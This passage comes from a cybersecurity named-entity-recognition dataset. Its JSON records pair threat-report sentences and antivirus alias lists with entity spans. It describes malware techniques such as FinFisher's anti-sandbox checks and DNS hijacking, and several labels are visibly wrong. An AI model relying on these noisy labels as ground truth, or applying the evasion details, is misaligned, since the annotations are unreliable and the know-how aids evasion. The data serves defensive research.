Rootkit.Small!LMZdSa8k9cE Win32/Trojan.45a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002453", "source": "cyner2_train"}} {"text": "The injected DLL then downloads the fileless Gootkit and saves it in the registry as binary data, then loading it in memory only.", "spans": {"MALWARE: fileless Gootkit": [[36, 52]]}, "info": {"id": "cyner2_train_002454", "source": "cyner2_train"}} {"text": "This article mainly analyzes the controlling end, the generator and Windows and Linux variants in controlled end of this tool and makes a display of the homologous analysis and network infection of these samples.", "spans": {"SYSTEM: Windows": [[68, 75]], "SYSTEM: Linux": [[80, 85]], "MALWARE: tool": [[121, 125]]}, "info": {"id": "cyner2_train_002456", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zlob Adware.NetAdware.BD", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002459", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FakeSvchostXKRB.Trojan Trojan-Downloader.Win32.Geral!O Downloader.Dogrobot.20415 Win32/SillyDl.QAC Trojan-Dropper.Win32.Injector.paib Trojan.Win32.Vilsel.iini Troj.Downloader.W32.Geral.kYTA Trojan.Win32.Downloader.wzh BackDoor.Guan.14 Downloader.Geral.Win32.1376 BehavesLike.Win32.StartPage.lm W32.Malware.Downloader Trojan[Dropper]/Win32.Injector Trojan.Win32.Downloader.16384.BHH Trojan-Dropper.Win32.Injector.paib TrojanDownloader:Win32/Dogrobot.D Trojan.Win32.Qhost", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002463", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Dialer!O Trojan.Zenshirsh.SL7 Trojan.Dialer Win32.Trojan.WisdomEyes.16070401.9500.9746 Win32/Startpage.RT TROJ_CJ.A Win.Trojan.Dialer-61 Trojan.Win32.Dialer.cj Trojan.Win32.MLW.wvye Troj.W32.Diamin.l3NB TrojWare.Win32.Dialer.A Dialer.Virgilio TROJ_CJ.A Trojan/Dialer.cio Trojan/Win32.Dialer Trojan.Win32.Dialer.cj Trojan/Win32.Dialer.R2306 MalwareScope.Dialer.Small.1 Dialer.LBU Win32.Trojan.Dialer.Pgxd Trojan.Win32.Dialer.cj", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002465", "source": "cyner2_train"}} {"text": "Thanks to Bulwarkz for additional Forensic Analysis: - Clears the windows event log - Clears the journal log - Drops executables to the windows directory and starts them - Shows the ability to spread by using its contained functionality to enumerate network shares of other attached devices - Uses shutdown.exe to shutdown or reboot the system - Contains functionality to register a low level keyboard hook - Contains functionality to infect the boot sector.", "spans": {"ORGANIZATION: Bulwarkz": [[10, 18]]}, "info": {"id": "cyner2_train_002466", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9894 Trojan.Win32.CsDown.bdcfvq 
Trojan.CsDown.25 TrojanDropper:Win32/Waltrodock.B Trojan.Graftor.D4ACD Trojan.CsNowDown!qDe+BhsdQ1Y W32/WDockDrp.A!tr Trj/CI.A Win32/Trojan.8ea", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002467", "source": "cyner2_train"}} {"text": "The decoy documents and filenames used in the attacks suggest the intended targets include organisations with political interests or influence in Israel and Palestine.", "spans": {}, "info": {"id": "cyner2_train_002468", "source": "cyner2_train"}} {"text": "A lot of additional anti-sandbox checks are performed in this exact order : Check that the malware is not executed under the root folder of a drive Check that the malware file is readable from an external source Check that the hash of base path is not 3D6D62AF1A7C8053DBC8E110A530C679 Check that the full malware path contains only human readable characters ( “ a-z ” , “ A-Z ” , and “ 0-9 ” ) Check that no node in the full path contains the MD5 string of the malware file Fingerprint the system and check the following registry values : HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid should not be “ 6ba1d002-21ed-4dbe-afb5-08cf8b81ca32 ” HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\DigitalProductId should not be “ 55274-649-6478953-23109 ” , “ A22-00001 ” , or “ 47220 ” HARDWARE\\Description\\System\\SystemBiosDate should not contain “ 01/02/03 ” Check that the mutex WininetStartupMutex0 does not already exist Check that no DLL whose base name has hash value of 0xC9CEF3E4 is mapped into the malware address space The hashes in these checks are most likely correspond to sandbox or security products that the FinFisher authors want to avoid .", "spans": {"MALWARE: FinFisher": [[1122, 1131]]}, "info": {"id": "cyner2_train_002469", "source": "cyner2_train"}} {"text": "Halloween is still a month from now and yet Android users are already being haunted by the previously reported Ghost Push malware, which roots devices and makes them download unwanted 
ads and apps.", "spans": {"SYSTEM: Android users": [[44, 57]], "MALWARE: Ghost Push malware,": [[111, 130]], "SYSTEM: roots devices": [[137, 150]]}, "info": {"id": "cyner2_train_002470", "source": "cyner2_train"}} {"text": "Last March, we reported on Operation C-Major, an active information theft campaign that was able to steal sensitive information from high profile targets in India.", "spans": {"THREAT_ACTOR: Operation C-Major,": [[27, 45]], "THREAT_ACTOR: theft campaign": [[68, 82]], "ORGANIZATION: high profile targets": [[133, 153]]}, "info": {"id": "cyner2_train_002471", "source": "cyner2_train"}} {"text": "Custom Content Type Manager CCTM is a relatively popular plugin with three years of development, 10,000+ active installs, and a satisfaction rating of 4.8. It helps create custom post types.", "spans": {"ORGANIZATION: Custom Content Type Manager CCTM": [[0, 32]], "SYSTEM: plugin": [[57, 63]]}, "info": {"id": "cyner2_train_002472", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Heur.AutoIT.13 Win32/Fynloski.STBTHUD Trojan.Win32.DarkKomet.dokuem Trojan.DownLoader12.11337 Trojan.Script.abcv Trojan:Win32/Manger.A Trojan.Autoit.Wirus Win32/TrojanDropper.Autoit.IC Win32/Trojan.Script.ed4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002474", "source": "cyner2_train"}} {"text": "Moreover, the Sednit group has a special interest in Eastern Europe, where it regularly targets individuals and organizations involved in geopolitics", "spans": {"THREAT_ACTOR: Sednit group": [[14, 26]], "ORGANIZATION: individuals": [[96, 107]], "ORGANIZATION: organizations": [[112, 125]]}, "info": {"id": "cyner2_train_002475", "source": "cyner2_train"}} {"text": "This virus ransomware arrives via email in a malicious attachment or by usurping an Adobe Flash Player installation.", "spans": {"MALWARE: virus ransomware": [[5, 21]]}, "info": {"id": "cyner2_train_002476", "source": "cyner2_train"}} {"text": "Within a few minutes of installing 
one of these Trojans, all other active malware on the network is enabled on the victim's device.", "spans": {"MALWARE: Trojans,": [[48, 56]], "MALWARE: malware": [[74, 81]], "SYSTEM: victim's device.": [[115, 131]]}, "info": {"id": "cyner2_train_002477", "source": "cyner2_train"}} {"text": "This particular application/game from Google Play Store is certainly not a system application, as the name seems intended to suggest.", "spans": {"SYSTEM: application/game": [[16, 32]], "SYSTEM: Google Play Store": [[38, 55]], "SYSTEM: system application,": [[75, 94]]}, "info": {"id": "cyner2_train_002478", "source": "cyner2_train"}} {"text": "The bank then shared indicators of compromise IOCs with other institutions and a number of other institutions confirmed that they too had been compromised.", "spans": {"ORGANIZATION: The bank": [[0, 8]], "ORGANIZATION: institutions": [[62, 74], [97, 109]]}, "info": {"id": "cyner2_train_002479", "source": "cyner2_train"}} {"text": "A few of these organizations have specifically been targeted by OceanLotus since early 2015.", "spans": {"ORGANIZATION: organizations": [[15, 28]], "ORGANIZATION: OceanLotus": [[64, 74]]}, "info": {"id": "cyner2_train_002481", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.MurLoDll1.Trojan Trojan-Downloader.Win32.Murlo!O Downloader.Murlo.Win32.5244 Trojan/Downloader.Murlo.nn TROJ_MURLO.BA Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Downloader.EKMU-1740 Win32/TrojanDownloader.Murlo.NN TROJ_MURLO.BA Win.Trojan.Murlo-7 Trojan-Downloader.Win32.Murlo.nn Trojan.Win32.Murlo.cpwkr Trojan.Win32.Downloader.5632.AY Trojan.DownLoader.62110 Trojan-Downloader.Win32.Murlo W32/Downldr2.CIAF TrojanDownloader.Murlo.hb Trojan[Downloader]/Win32.Murlo TrojanDownloader:Win32/Almanahe.A Trojan-Downloader.Win32.Murlo.nn Win32/SillyDl.EPI TrojanDownloader.Murlo W32/Murlo.NN!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002482", "source": "cyner2_train"}} {"text": "A backdoor also 
known as: Worm.Wabbin Win32.Trojan.WisdomEyes.16070401.9500.9773 W32.Wabbin Win.Worm.Wabbin-1 Email-Worm.Win32.Wabbin Trojan.Win32.Wabbin.eoih Email.Worm.W32!c IM-Worm.Win32.VB W32/Trojan.TLKW-6882 Worm[Email]/Win32.Wabbin Trojan.Heur.VP.E513A3 Email-Worm.Win32.Wabbin Worm:Win32/Wabbin.A@mm Worm.Wabbin Trj/CI.A Win32.Worm-email.Wabbin.Dxnb Worm.Wabbin! W32/Wabbin.A@mm Win32/Trojan.97a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002485", "source": "cyner2_train"}} {"text": "A backdoor also known as: I-Worm.Music.C W32/Music.40960.B Music.H WORM_MUSIC.B Email-Worm.Win32.Music.B Worm.Win32.Email-Worm.Music.B BACKDOOR.Trojan WORM_MUSIC.B W32/Music.40960.B I-Worm/Music.b WORM/Music.B Worm:Win32/Music.C@mm I-Worm.Win32.Music.B[h] W32/Music.B Win32/Music.B Email-Worm.Win32.Music.A W32/Music.B@mm Worm.Win32.Music.Abh", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002486", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Hijack.356352.M VirTool.DelfInject Trojan.DelfInject Dropper.Injector.Win32.25443 Trojan/Dropper.Injector.dyha Win32.Trojan.Delf.k TROJ_NEOJIT.SMAR Trojan.Win32.Buzus.rfedr Trojan.DownLoader6.1239 TROJ_NEOJIT.SMAR BehavesLike.Win32.Worm.fh TrojanDropper.Injector.taw Trojan/Win32.Buzus TrojanDownloader:Win32/Neojit.A Trojan/Win32.Injector.R23295 BScope.Trojan-Dropper.Injector Win32/Delf.OEN Trojan-Downloader.Win32.Neojit Win32/Trojan.dee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002487", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.MTX.B@mm W95.MTX Win32.MTX.B@mm W32/MTX@M.dll WORM_MTX.D W32/MTX.9244.B WORM_MTX.D Win.Trojan.MTX-5 Win32.MTX.B@mm Email-Worm.Win32.MTX.D Win32.MTX.B@mm Virus.Win32.MTX.hfxi Win32.MTX Win32.MTX.B@mm Win32.MTX.B@mm Win95.Matrix.9307 W95/MTX.dll@M W32/MTX.9244.B I-Worm/MTX.d W95/Mtx.B Win32.MTX.E2C45E Email-Worm.Win32.MTX.D Worm:Win32/MTX.B.dll W95/MTX.dll@M W32/MTX.D!worm", "spans": {"MALWARE: 
backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002488", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Small.9728.KQ Win32.Trojan.WisdomEyes.16070401.9500.9990 Backdoor.Teambot Win.Trojan.Zapchast-130 Trojan.Win32.TeamBot.ctspsr BackDoor.TeamBot.60 Trojan/Zapchast.exm W32/Sheldor.NAB!tr Win32.Troj.Undef.kcloud Trojan.Graftor.Elzob.950 Troj.W32.Zapchast.lhAn Trojan:Win32/Availmetre.B Trojan/Win32.Zapchast.R17936 SScope.Backdoor.Mudak Trojan.Win32.Availmetre", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002490", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32!O Backdoor.Small.MUE.A11 RiskWare.SpySoft Trojan.Udr.Win32.1 W32/BackdoorX.GMX Backdoor.Trojan Win32/BackMan.A BKDR_NEWHEUR.IZ Win.Trojan.Udr-1 Backdoor.Win32.Udr.a Trojan.Win32.Udr.csnpza Backdoor.Win32.Udr.aa BackDoor.Udr.1 BKDR_NEWHEUR.IZ BehavesLike.Win32.Backdoor.fc W32/Backdoor.COLY-8496 Backdoor/Udr.d BDS/Udr.A Trojan[Backdoor]/Win32.Udr Win32.Hack.Udr.B5.kcloud Backdoor.Win32.Udr.692018 Backdoor.Win32.Udr.a Trojan/Win32.Udr.R577 OScope.Backdoor.Udr Backdoor.JYfi Backdoor.Udr!EwW5NHJTxmo Backdoor.Win32.Udr W32/Udr.A!tr.bdr Dialer.CKP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002492", "source": "cyner2_train"}} {"text": "It also has a general purpose-proxy and a module for sending spam messages.", "spans": {"ORGANIZATION: general": [[14, 21]]}, "info": {"id": "cyner2_train_002493", "source": "cyner2_train"}} {"text": "The attackers attempted to steal $951m, of which $81m is still unaccounted for.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]]}, "info": {"id": "cyner2_train_002494", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9828 Win32.Trojan.Kriskynote.Ozic Trojan.Win32.Kriskynote Backdoor:Win32/Kriskynote.A BScope.Trojan.SvcHorse.01643 W32/Dropper.TMP!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_002495", "source": "cyner2_train"}} {"text": "Before that patch was released, the groups launched phishing campaigns against multiple companies in the aerospace and defense, construction and engineering, education, energy, health and biotechnology, high tech, non-profit, telecommunications, and transportation industries.", "spans": {"THREAT_ACTOR: phishing campaigns": [[52, 70]], "ORGANIZATION: multiple companies": [[79, 97]], "ORGANIZATION: aerospace": [[105, 114]], "ORGANIZATION: defense,": [[119, 127]], "ORGANIZATION: engineering, education, energy, health": [[145, 183]], "ORGANIZATION: biotechnology, high tech, non-profit, telecommunications,": [[188, 245]], "ORGANIZATION: transportation industries.": [[250, 276]]}, "info": {"id": "cyner2_train_002497", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ollexos Win32.Trojan.Heur.Lhdl Trojan.Heur.Win32.9371 BehavesLike.Win32.Spyware.jc TR/RedCap.xrytt Trojan.Heur.OmNfrrOwGgmOh Trojan.Win32.Z.Redcap.655360 Trojan:Win32/Ollexos.A Win32/Trojan.7b0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002499", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGamesHEXW32AH.Trojan Trojan.Win32.Scar!O BackDoor.Boomie.A3 Trojan.Scar.Win32.63773 Trojan/Scar.fvka Win32.Trojan.Scar.d Win.Trojan.Scar-895 Trojan.Win32.Scar.fvka Trojan.Win32.Scar.bbmdmf Troj.W32.Scar.fvka!c Trojan.Win32.Scar.ft Trojan.DownLoad2.52794 Backdoor.Win32.Boomie Trojan/Scar.azbo Trojan/Win32.Scar Backdoor:Win32/Boomie.A Trojan.Win32.Scar.fvka Win-Trojan/Boomie.40960 Trojan.Scar!AGwL0r/7hW4 Win32/Trojan.Spy.81b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002500", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Shamoon.A Trojan/W32.Shamoon.192000 Trojan.Depriz Trojan/DistTrack.d Trojan.Shamoon.A Win32.Trojan.WisdomEyes.16070401.9500.9987 W32.Disttrack.B TROJ64_DISTTRACK.D Win.Malware.DistTrack-5743117-1 Trojan.Shamoon.A 
Trojan.Shamoon.A Trojan.Win64.DistTrack.elcfal Trojan.Win32.Z.Disttrack.192000 Trojan.Shamoon.A Trojan.Shamoon.A Trojan.DistTrack.Win32.9 TROJ64_DISTTRACK.D W64/Trojan.BOAO-0112 Trojan:Win64/Depriz.E!dha Trojan.DistTrack.A Trj/CI.A W64/DistTrack.D!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002501", "source": "cyner2_train"}} {"text": "FastPOS was true to its moniker—pilfer data as fast as possible, as much as it can, even at the expense of stealth.", "spans": {"MALWARE: FastPOS": [[0, 7]]}, "info": {"id": "cyner2_train_002502", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Banload!O Trojan/Downloader.Banload.qku Trojan.Graftor.D3222 Win32.Trojan.WisdomEyes.16070401.9500.9991 Trojan.DownLoad2.52025 Downloader.Banload.Win32.37297 Trojan.Win32.Spy TrojanDownloader:Win32/Spycos.B TrojanDownloader.Banload", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002503", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.KVM.B Backdoor/W32.KWM.70656 PWS-Susanin.dr Backdoor.KVM.B Trojan.KWM.B2 Infostealer.KMW.B KWM.B Win32/PSW.KWM.B BKDR_KWM.B Backdoor.Win32.KWM.b Trojan.Win32.KWM.baukx PE:Trojan.KWM.b!1073777723 Backdoor.KVM.B TrojWare.Win32.PSW.Susanin.B Backdoor.KVM.B BackDoor.KWM Backdoor.KWM.Win32.11 BKDR_KWM.B PWS-Susanin.dr W32/Risk.SBUI-3175 Backdoor/KWM.b TR/WebMoney.2 Trojan[Backdoor]/Win32.KWM Win32.Hack.KWM.b.kcloud PWS:Win32/Susanin.B Backdoor.Win32.KWM.70656[h] Win-Trojan/KWM.70656 Backdoor.KVM.B Backdoor.KVM.B Dropper.PSW.Liz.17 Trj/PSW.Susanin Win32/PSW.Susanin.B Backdoor.Win32.Kwm.B W32/Contract.B!tr.bdr PSW.Susanin Backdoor.Win32.KWM.aWbC", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002505", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Raxlogon.Trojan Worm.Win32.AutoRun!O Worm.Autorun.ZI8 Worm.AutoRun.Win32.22949 Win32.Worm.FakeFolder.b Win32/QQPass.NNE Worm.AutoRun Worm.Win32.AutoRun.hit 
Trojan.Win32.AutoRun.uaado Worm.Win32.Autorun.81108 Worm.Win32.Pronny.BL Trojan.PWS.Qqpass.5627 BackDoor-CCT.dll Worm/AutoRun.wxz Trojan:Win32/Hideproc.E Trojan[Monitor]/Win32.ActualSpy Win32.Troj.Undef.kcloud HEUR/Fakon.mwf Trojan.AVKill W32/Autorun.KBC Trojan.Win32.FakeFolder.pb Worm.AutoRun!PDL9JmhYC4g Backdoor.Win32.DarkMoon", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002506", "source": "cyner2_train"}} {"text": "New campaign involving PoSeidon/FindPOS point of sale malware", "spans": {"MALWARE: campaign": [[4, 12]], "MALWARE: point of sale malware": [[40, 61]]}, "info": {"id": "cyner2_train_002507", "source": "cyner2_train"}} {"text": "This morning Mozilla released security updates that fix the vulnerability.", "spans": {"ORGANIZATION: Mozilla": [[13, 20]], "VULNERABILITY: vulnerability.": [[60, 74]]}, "info": {"id": "cyner2_train_002508", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Notepices Win32.Trojan.WisdomEyes.16070401.9500.9871 not-a-virus:AdWare.Win32.ICLoader.alpu Riskware.Win32.Hpdefender.ekfhpl Trojan.StartPage1.28867 Trojan.Win32.Notepices Pua.Downloader GrayWare[AdWare]/Win32.Hpdefender not-a-virus:AdWare.Win32.ICLoader.alpu Adware.HPDefender Win32/Adware.HPDefender.JG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002509", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.RsLpTTc.Worm Ransom.Lyposit.S3755 W32.Sality.lak4 Trojan/Lyposit.a Trojan.Zusy.D382F1 Ransom_Lyposit.R002C0CAT18 Win32.Trojan.WisdomEyes.16070401.9500.9902 Ransom_Lyposit.R002C0CAT18 Win.Trojan.Updays-1 Trojan.Win32.Clicker.efvwpu TrojWare.Win32.Lyposit.C Trojan.Click2.50933 Trojan.Lyposit.Win32.25 Trojan-Ransom.Lyposit Ransom:Win32/Lyposit.B Trojan/Win32.Lyposit.R188188 W32/Lyposit.A70!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002511", "source": "cyner2_train"}} {"text": "The malware used in email campaigns is often ransomware or banking 
malware.", "spans": {"MALWARE: malware": [[4, 11]], "THREAT_ACTOR: email campaigns": [[20, 35]], "MALWARE: ransomware": [[45, 55]], "MALWARE: banking malware.": [[59, 75]]}, "info": {"id": "cyner2_train_002512", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Injector.AutoIt Trojan.StartPage1.24074 TrojanClicker:Win32/Rubalotalow.A Win32/Trojan.ab1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002514", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Virus.Win32.Sality!O Win32.Trojan.WisdomEyes.16070401.9500.9989 Win.Trojan.Zusy-6041926-0 Trojan.Win32.Scar.okvf Win32.Trojan.Scar.Wwek Trojan.DownLoader24.19336 Trojan.Scar.kws Trojan/Win32.Cosmu PWS:Win32/Sapbexts.B Trojan.Win32.Scar.okvf Trojan/Win32.Cosmu.R214802 Trojan.Vilsel Trojan.Cosmu!F9mC6Li+PNw Win32/Trojan.Scar.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002515", "source": "cyner2_train"}} {"text": "You may mistakenly download and run TrojanDropper:Win32/Gepys.A, thinking it is an update for Java.", "spans": {}, "info": {"id": "cyner2_train_002516", "source": "cyner2_train"}} {"text": "If the attack succeeds, the malware changes the addresses of the DNS servers in the router's settings, thereby rerouting all DNS queries from devices in the attacked Wi-Fi network to the servers of the cybercriminals such an attack is also known as DNS-hijacking.", "spans": {"MALWARE: malware": [[28, 35]], "SYSTEM: DNS servers": [[65, 76]], "SYSTEM: router's settings,": [[84, 102]], "SYSTEM: DNS queries": [[125, 136]], "SYSTEM: devices": [[142, 149]], "SYSTEM: Wi-Fi network": [[166, 179]], "SYSTEM: servers": [[187, 194]], "THREAT_ACTOR: cybercriminals": [[202, 216]]}, "info": {"id": "cyner2_train_002518", "source": "cyner2_train"}} {"text": "Interestingly, the attackers camouflage one of their delivery domains by redirecting visitors to El Universal, a major Mexican newspaper.", "spans": {"THREAT_ACTOR: 
attackers": [[19, 28]], "ORGANIZATION: El Universal, a major Mexican newspaper.": [[97, 137]]}, "info": {"id": "cyner2_train_002522", "source": "cyner2_train"}} {"text": "These emails are mainly sent to Colombians who may work in the accounting or finance departments of various-sized organizations.", "spans": {}, "info": {"id": "cyner2_train_002523", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader Trojan/Downloader.Boaxxe.aa Win32.TRDldr.JeRips TR/Dldr.JeRips.A W32/Boaxxe.AB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002525", "source": "cyner2_train"}} {"text": "Service Name Purpose AndroidAlarmManager Uploading last recorded .amr audio AndroidSystemService Audio recording AndroidSystemQueues Location tracking with movement detection ClearSystems GSM tracking ( CID , LAC , PSC ) ClipService Clipboard stealing AndroidFileManager Uploading all exfiltrated data AndroidPush XMPP С & C protocol ( url.plus:5223 ) RegistrationService Registration on C & C via HTTP ( url.plus/app/pro/ ) Interestingly , a self-protection feature was implemented in almost every service .", "spans": {"SYSTEM: GSM": [[188, 191]]}, "info": {"id": "cyner2_train_002526", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.MulDrop5.40693 TR/Downloader.A.7912 Trojan[Ransom]/Win32.Blocker Trojan:MSIL/Dubfot.A Trojan.FakeMS Trojan.MSIL.IRCBot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002527", "source": "cyner2_train"}} {"text": "New ransomware using the .ipygh extension.", "spans": {"MALWARE: ransomware": [[4, 14]]}, "info": {"id": "cyner2_train_002530", "source": "cyner2_train"}} {"text": "How do you know if your Google account is breached ? 
You can check if your account is compromised by accessing the following web site that we created : https : //gooligan.checkpoint.com/ .", "spans": {"ORGANIZATION: Google": [[24, 30]]}, "info": {"id": "cyner2_train_002531", "source": "cyner2_train"}} {"text": "The most recently discovered Microsoft SQL server being used as Escalar infrastructure contained records of 1660 infections that all connected in a two-day time frame.", "spans": {"SYSTEM: Microsoft SQL server": [[29, 49]], "MALWARE: Escalar": [[64, 71]], "SYSTEM: infrastructure": [[72, 86]]}, "info": {"id": "cyner2_train_002533", "source": "cyner2_train"}} {"text": "Later on, we found evidence of the same attack perpetrated on May 3.", "spans": {}, "info": {"id": "cyner2_train_002534", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Worm.Lemoor.A Worm/W32.Lemoor.1981 Trojan-Downloader.Win32.Small!O Win32.Worm.Lemoor.A Worm.Lemoor.Win32.2 W32.W.Lemoor.a!c W32/Lemoor.a Win32.Worm.Lemoor.A WORM_LEMOOR.D Win32.Trojan.WisdomEyes.16070401.9500.9995 W32/Lemoor.A W32.Lemoor.A WORM_LEMOOR.D Win.Worm.Lemoor-3 Win32.Worm.Lemoor.A Worm.Win32.Lemoor.a Win32.Worm.Lemoor.A Win32.Worm.Lemoor.A Worm.Win32.Lemoor.B Win32.Worm.Lemoor.A Win32.Ephem.24 W32/Lemoor.JDMS-3575 I-Worm/Lemoor.a WORM/Lemoor.A Worm/Win32.Lemoor Worm.Win32.Lemoor.a Worm/Win32.Lemoor.R37765 Worm.Lemoor W32/Lemoor.B.worm Win32/Lemoor.B Win32.Worm.Lemoor.Ahos Worm.Lemoor!V5CZ/YV1RTs Worm.Win32.Lemoor W32/Lemoor.A!worm Win32/Worm.857", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002535", "source": "cyner2_train"}} {"text": "User-agent: Go-http-client/1.1", "spans": {}, "info": {"id": "cyner2_train_002536", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Skeeyah Trojan.KillDisk.Win32.208 Trojan/KillDisk.nbh Win32.Trojan.WisdomEyes.16070401.9500.9834 Trojan.Disakil Win.Trojan.KillDisk-3 Trojan.Win32.KillDisk.fw Win32.Trojan.Killdisk.Pgmq Trojan:Win32/KillDisk.N!dha Trojan.KillDisk.1 
Trojan.Win32.KillDisk.fw Trojan/Win32.KillDisk.C1706046 Trojan.KillDisk Win32/KillDisk.NBH Trojan.KillDisk!B1yc+Gvh2zs Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002537", "source": "cyner2_train"}} {"text": "The normal lifecycle of an Office exploit starts with the initial use in targeted attacks.", "spans": {"VULNERABILITY: an Office exploit": [[24, 41]]}, "info": {"id": "cyner2_train_002539", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PSW.Win32.LdPinch!O TrojanPWS.Ldpinch Win32.Trojan.WisdomEyes.16070401.9500.9997 Win32/Tnega.YML TSPY_LDPINCH_DD3005CF.UVPA Trojan-PSW.Win32.LdPinch.guf Trojan.Win32.LdPinch.crgdkw Trojan.LdPinch.Win32.5281 BehavesLike.Win32.Trojan.fz Trojan.Win32.Vilsel W32/Trojan.JQPI-8861 Trojan/PSW.LdPinch.pxf Trojan[PSW]/Win32.LdPinch Trojan.Heur.E4E165 Troj.Psw.W32.Ldpinch!c Trojan-PSW.Win32.LdPinch.guf PWS:Win32/Phorex.A Trojan/Win32.LdPinch.R68731 Trojan.PWS.LdPinch!MPU8gCWOSOw W32/LdPinch.GUF!tr.pws TrojanPSW.Pinch Win32/Trojan.PSW.b93", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002541", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PWS.QQRob.NBU Trojan-PSW.Win32.QQPass!O PSW.QQPass.13953 Trojan.PWS.QQRob.NBU Trojan/PSW.QQPass.ban Win32.Worm.Autorun.ar Infostealer.QQRob.A WORM_AUTORUN.EDD Win.Trojan.QQPass-84 Trojan.PWS.QQRob.NBU Trojan-PSW.Win32.QQPass.ban Trojan.PWS.QQRob.NBU Trojan.Win32.QQPass.btqyi Trojan.Win32.Z.Qqpass.73427 Trojan.Tencent/Variant Trojan.PWS.QQRob.NBU TrojWare.Win32.PSW.QQPass.~GK Trojan.PWS.Qqpass.1364 WORM_AUTORUN.EDD BehavesLike.Win32.PWSQQGame.lh W32/Pws.VYB Trojan/PSW.QQPass.bhp Win32.Troj.QQPswT.bs.116858 Trojan.PWS.QQRob.NBU Troj.Psw.W32.Qqpass!c Trojan-PSW.Win32.QQPass.ban MalwareScope.Trojan-PSW.Game.7 Trj/QQPass.AOI Win32.Trojan-qqpass.Qqrob.Pcsk Trojan-Dropper.Win32.Delf W32/Dropper.DLF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002542", "source": 
